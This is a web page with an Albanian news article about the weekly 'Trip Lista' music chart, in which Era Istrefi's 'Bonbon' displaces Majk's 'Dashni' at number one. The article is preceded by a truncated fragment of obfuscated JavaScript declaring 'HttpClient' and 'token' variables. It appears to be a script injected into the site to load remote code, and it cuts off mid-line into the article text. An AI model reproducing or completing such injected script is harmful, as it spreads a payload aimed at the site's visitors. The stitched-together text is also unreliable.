;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Dashni’ mposhtet nga ‘Bonbon’ n’Trip Listë

By

Edicioni i radhës i emisionit Trip Lista me Vlorijan Halilin solli ndryshime në pozita këtë javë.

Bashkëpunimi i Besa Kokëdhimës me Ansin u rendit i 20-ti kurse këngë si ‘A do si kjo’ e Ronela Hajatit, ‘Asnihere’ e Lindonit dhe Adrian Gaxhës dhe ‘Big booty’ nga Çiljeta, Lil Koli e Filloreta zunë vendet deri në pozitën e 10.

10-shja u hap me Mozzik dhe ‘Dhezu’ e vazhdoi në pozitën e nëntë poashtu me anëtaren tjetër të On Records, Kidën.

Dafina me Lumin dhe Capital T zunë pozitën e tetë, respektivisht të shtatë ndërsa e pesta u rendit Eni Koçi me këngën e saj solo ‘Si dikur’.

Mc Kresha me ‘Era’ doli i katërti ndërsa ‘Shumë on’ nga Dhurata Dora edhe pse është lançuar tash e një kohë, arriti të kap pozitën e tretë.

Ballafaqimi i fortë edhe kësaj rradhe ishte mes Majkit dhe Erës, dy prej emrave më të suksesshëm në diskografinë shqiptare kohëve të fundit.

Por ndryshe nga disa jave rresht, ‘Dashni’ u mposht nga ‘Bonbon’ që si një hit tashmë me përmasa ndërkombëtare u rendit i pari n’Trip Listë.

Ndryshe, kënga e fundit nga fenomeni Era Istrefi i është afruar mjaft shumë me shikime edhe në Youtube ‘Dashni’-së së Majkit edhe pse është publikuar dy javë më vonë.

Prurje në emision janë këngët ‘Mos harro’ e ‘Pa ty’ nga Ryva, ‘Erën e saj’ nga Adelina Berisha e Robb Daddy dhe ‘Presion’ nga Blunt dhe Real.

Mbetet të shihet pas një jave se si do ndryshojnë pozicionet në emisionin Trip Lista.

Artikuj të ngjashëm